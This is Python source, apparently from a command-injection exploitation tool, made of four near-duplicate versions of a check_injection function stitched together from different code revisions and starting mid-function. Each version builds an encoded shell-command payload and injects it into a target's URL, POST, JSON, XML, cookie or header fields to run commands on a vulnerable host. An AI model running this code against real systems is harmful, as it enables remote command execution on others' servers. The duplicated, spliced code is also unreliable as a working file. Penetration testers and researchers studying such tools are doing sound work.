request = urllib2.Request(url, data)
else:
if settings.IS_XML:
data = parameter.replace(settings.INJECT_TAG, urllib.unquote(payload))
else:
data = parameter.replace(settings.INJECT_TAG, payload)
request = urllib2.Request(url, data)
# Check if defined extra headers.
headers.do_check(request)
# Get the response of the request
response = requests.get_request_response(request)
return response
def check_injection(separator, TAG, cmd, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, alter_shell, filename):
# Execute shell commands on vulnerable host.
if alter_shell:
payload = eb_payloads.cmd_execution_alter_shell(separator, TAG, cmd)
else:
payload = eb_payloads.cmd_execution(separator, TAG, cmd)
# Fix prefixes / suffixes
payload = parameters.prefixes(payload, prefix)
payload = parameters.suffixes(payload, suffix)
# Fixation for specific payload.
if ")%3B" + urllib.quote(")}") in payload:
payload = payload.replace(")%3B" + urllib.quote(")}"), ")" + urllib.quote(")}"))
# Whitespace fixation
payload = re.sub(" ", whitespace, payload)
if settings.TAMPER_SCRIPTS['base64encode']:
from src.core.tamper import base64encode
payload = base64encode.encode(payload)
# Check if defined "--verbose" option.
if settings.VERBOSITY_LEVEL >= 1:
info_msg = "Executing the '" + cmd + "' command: "
sys.stdout.write("\n" + settings.print_info_msg(info_msg))
sys.stdout.flush()
sys.stdout.write("\n" + settings.print_payload(payload) + "\n")
# Check if defined cookie with "INJECT_HERE" tag
if menu.options.cookie and settings.INJECT_TAG in menu.options.cookie:
response = cookie_injection_test(url, vuln_parameter, payload)
# Check if defined user-agent with "INJECT_HERE" tag
elif menu.options.agent and settings.INJECT_TAG in menu.options.agent:
response = user_agent_injection_test(url, vuln_parameter, payload)
# Check if defined referer with "INJECT_HERE" tag
elif menu.options.referer and settings.INJECT_TAG in menu.options.referer:
response = referer_injection_test(url, vuln_parameter, payload)
# Check if defined custom header with "INJECT_HERE" tag
elif settings.CUSTOM_HEADER_INJECTION:
response = custom_header_injection_test(url, vuln_parameter, payload)
else:
# Check if defined method is GET (Default).
if http_request_method == "GET":
# Check if its not specified the 'INJECT_HERE' tag
#url = parameters.do_GET_check(url)
target = re.sub(settings.INJECT_TAG, payload, url)
vuln_parameter = ''.join(vuln_parameter)
request = urllib2.Request(target)
# Check if defined extra headers.
headers.do_check(request)
# Get the response of the request
response = requests.get_request_response(request)
else :
# Check if defined method is POST.
parameter = menu.options.data
parameter = urllib2.unquote(parameter)
# Check if its not specified the 'INJECT_HERE' tag
parameter = parameters.do_POST_check(parameter)
parameter = parameter.replace("+","%2B")
# Define the POST data
if settings.IS_JSON == False:
data = re.sub(settings.INJECT_TAG, payload, parameter)
request = urllib2.Request(url, data)
else:
payload = payload.replace("\"", "\\\"")
data = re.sub(settings.INJECT_TAG, urllib.unquote(payload), parameter)
data = json.loads(data, strict = False)
request = urllib2.Request(url, json.dumps(data))
# Check if defined extra headers.
headers.do_check(request)
# Get the response of the request
response = requests.get_request_response(request)
return response
def check_injection(separator, TAG, cmd, prefix, suffix, whitespace,
http_request_method, url, vuln_parameter, alter_shell,
filename):
if alter_shell:
# Classic decision payload (check if host is vulnerable).
payload = cb_payloads.cmd_execution_alter_shell(
separator, TAG, cmd)
else:
# Classic decision payload (check if host is vulnerable).
payload = cb_payloads.cmd_execution(separator, TAG, cmd)
# Fix prefixes / suffixes
payload = parameters.prefixes(payload, prefix)
payload = parameters.suffixes(payload, suffix)
# Whitespace fixation
payload = payload.replace(" ", whitespace)
# Perform payload modification
payload = checks.perform_payload_modification(payload)
# Check if defined "--verbose" option.
if settings.VERBOSITY_LEVEL >= 1:
info_msg = "Executing the '" + cmd + "' command... "
sys.stdout.write(settings.print_info_msg(info_msg))
sys.stdout.flush()
sys.stdout.write("\n" + settings.print_payload(payload) + "\n")
# Check if defined cookie with "INJECT_HERE" tag
if menu.options.cookie and settings.INJECT_TAG in menu.options.cookie:
response = cookie_injection_test(url, vuln_parameter, payload)
# Check if defined user-agent with "INJECT_HERE" tag
elif menu.options.agent and settings.INJECT_TAG in menu.options.agent:
response = user_agent_injection_test(url, vuln_parameter, payload)
# Check if defined referer with "INJECT_HERE" tag
elif menu.options.referer and settings.INJECT_TAG in menu.options.referer:
response = referer_injection_test(url, vuln_parameter, payload)
# Check if defined host with "INJECT_HERE" tag
elif menu.options.host and settings.INJECT_TAG in menu.options.host:
response = host_injection_test(url, vuln_parameter, payload)
# Check if defined custom header with "INJECT_HERE" tag
elif settings.CUSTOM_HEADER_INJECTION:
response = custom_header_injection_test(url, vuln_parameter,
payload)
else:
# Check if defined method is GET (Default).
if http_request_method == "GET":
# Check if its not specified the 'INJECT_HERE' tag
#url = parameters.do_GET_check(url)
target = url.replace(settings.INJECT_TAG, payload)
vuln_parameter = ''.join(vuln_parameter)
request = _urllib.request.Request(target)
# Check if defined extra headers.
headers.do_check(request)
# Get the response of the request.
response = requests.get_request_response(request)
else:
# Check if defined method is POST.
parameter = menu.options.data
parameter = _urllib.parse.unquote(parameter)
# Check if its not specified the 'INJECT_HERE' tag
parameter = parameters.do_POST_check(parameter)
parameter = ''.join(str(e)
for e in parameter).replace("+", "%2B")
# Define the POST data
if settings.IS_JSON:
data = parameter.replace(
settings.INJECT_TAG,
_urllib.parse.unquote(payload.replace("\"", "\\\"")))
try:
data = checks.json_data(data)
except ValueError:
pass
elif settings.IS_XML:
data = parameter.replace(settings.INJECT_TAG,
_urllib.parse.unquote(payload))
else:
data = parameter.replace(settings.INJECT_TAG, payload)
request = _urllib.request.Request(
url, data.encode(settings.UNICODE_ENCODING))
# Check if defined extra headers.
headers.do_check(request)
# Get the response of the request.
response = requests.get_request_response(request)
return response
def check_injection(separator, TAG, cmd, prefix, suffix, whitespace,
http_request_method, url, vuln_parameter, alter_shell,
filename):
if alter_shell:
# Classic decision payload (check if host is vulnerable).
payload = cb_payloads.cmd_execution_alter_shell(
separator, TAG, cmd)
else:
# Classic decision payload (check if host is vulnerable).
payload = cb_payloads.cmd_execution(separator, TAG, cmd)
# Fix prefixes / suffixes
payload = parameters.prefixes(payload, prefix)
payload = parameters.suffixes(payload, suffix)
# Whitespace fixation
payload = re.sub(" ", whitespace, payload)
# Check for base64 / hex encoding
payload = checks.perform_payload_encoding(payload)
# Check if defined "--verbose" option.
if settings.VERBOSITY_LEVEL >= 1:
info_msg = "Executing the '" + cmd + "' command... "
sys.stdout.write(settings.print_info_msg(info_msg))
sys.stdout.flush()
sys.stdout.write("\n" + settings.print_payload(payload))
if settings.VERBOSITY_LEVEL > 1:
print ""
# Check if defined cookie with "INJECT_HERE" tag
if menu.options.cookie and settings.INJECT_TAG in menu.options.cookie:
response = cookie_injection_test(url, vuln_parameter, payload)
# Check if defined user-agent with "INJECT_HERE" tag
elif menu.options.agent and settings.INJECT_TAG in menu.options.agent:
response = user_agent_injection_test(url, vuln_parameter, payload)
# Check if defined referer with "INJECT_HERE" tag
elif menu.options.referer and settings.INJECT_TAG in menu.options.referer:
response = referer_injection_test(url, vuln_parameter, payload)
# Check if defined custom header with "INJECT_HERE" tag
elif settings.CUSTOM_HEADER_INJECTION:
response = custom_header_injection_test(url, vuln_parameter,
payload)
else:
# Check if defined method is GET (Default).
if http_request_method == "GET":
# Check if its not specified the 'INJECT_HERE' tag
#url = parameters.do_GET_check(url)
target = re.sub(settings.INJECT_TAG, payload, url)
vuln_parameter = ''.join(vuln_parameter)
request = urllib2.Request(target)
# Check if defined extra headers.
headers.do_check(request)
# Get the response of the request.
response = requests.get_request_response(request)
else:
# Check if defined method is POST.
parameter = menu.options.data
parameter = urllib2.unquote(parameter)
# Check if its not specified the 'INJECT_HERE' tag
parameter = parameters.do_POST_check(parameter)
parameter = parameter.replace("+", "%2B")
# Define the POST data
if settings.IS_JSON == False:
data = re.sub(settings.INJECT_TAG, payload, parameter)
request = urllib2.Request(url, data)
else:
payload = payload.replace("\"", "\\\"")
data = re.sub(settings.INJECT_TAG, urllib.unquote(payload),
parameter)
try:
data = json.loads(data, strict=False)
except:
pass
request = urllib2.Request(url, json.dumps(data))
# Check if defined extra headers.
headers.do_check(request)
# Get the response of the request.
response = requests.get_request_response(request)
return response
def check_injection(separator, TAG, cmd, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, alter_shell, filename):
# Execute shell commands on vulnerable host.
if alter_shell:
payload = eb_payloads.cmd_execution_alter_shell(separator, TAG, cmd)
else:
payload = eb_payloads.cmd_execution(separator, TAG, cmd)
# Fix prefixes / suffixes
payload = parameters.prefixes(payload, prefix)
payload = parameters.suffixes(payload, suffix)
# Fixation for specific payload.
if ")%3B" + _urllib.parse.quote(")}") in payload:
payload = payload.replace(")%3B" + _urllib.parse.quote(")}"), ")" + _urllib.parse.quote(")}"))
# Whitespace fixation
payload = payload.replace(settings.SINGLE_WHITESPACE, whitespace)
# Perform payload modification
payload = checks.perform_payload_modification(payload)
# Check if defined "--verbose" option.
if settings.VERBOSITY_LEVEL != 0:
debug_msg = "Executing the '" + cmd + "' command. "
sys.stdout.write(settings.print_debug_msg(debug_msg))
sys.stdout.flush()
sys.stdout.write("\n" + settings.print_payload(payload) + "\n")
# Check if defined cookie with "INJECT_HERE" tag
if menu.options.cookie and settings.INJECT_TAG in menu.options.cookie:
response = cookie_injection_test(url, vuln_parameter, payload)
# Check if defined user-agent with "INJECT_HERE" tag
elif menu.options.agent and settings.INJECT_TAG in menu.options.agent:
response = user_agent_injection_test(url, vuln_parameter, payload)
# Check if defined referer with "INJECT_HERE" tag
elif menu.options.referer and settings.INJECT_TAG in menu.options.referer:
response = referer_injection_test(url, vuln_parameter, payload)
# Check if defined host with "INJECT_HERE" tag
elif menu.options.host and settings.INJECT_TAG in menu.options.host:
response = host_injection_test(url, vuln_parameter, payload)
# Check if defined custom header with "INJECT_HERE" tag
elif settings.CUSTOM_HEADER_INJECTION:
response = custom_header_injection_test(url, vuln_parameter, payload)
else:
# Check if defined POST data
if not settings.USER_DEFINED_POST_DATA:
# Check if its not specified the 'INJECT_HERE' tag
#url = parameters.do_GET_check(url, http_request_method)
target = url.replace(settings.INJECT_TAG, payload)
vuln_parameter = ''.join(vuln_parameter)
request = _urllib.request.Request(target)
# Check if defined extra headers.
headers.do_check(request)
# Get the response of the request
response = requests.get_request_response(request)
else :
# Check if defined method is POST.
parameter = menu.options.data
parameter = _urllib.parse.unquote(parameter)
# Check if its not specified the 'INJECT_HERE' tag
parameter = parameters.do_POST_check(parameter, http_request_method)
parameter = ''.join(str(e) for e in parameter).replace("+","%2B")
# Define the POST data
if settings.IS_JSON:
data = parameter.replace(settings.INJECT_TAG, _urllib.parse.unquote(payload.replace("\"", "\\\"")))
try:
data = checks.json_data(data)
except ValueError:
pass
elif settings.IS_XML:
data = parameter.replace(settings.INJECT_TAG, _urllib.parse.unquote(payload))
else:
data = parameter.replace(settings.INJECT_TAG, payload)
request = _urllib.request.Request(url, data.encode(settings.DEFAULT_CODEC))
# Check if defined extra headers.
headers.do_check(request)
# Get the response of the request
response = requests.get_request_response(request)
return response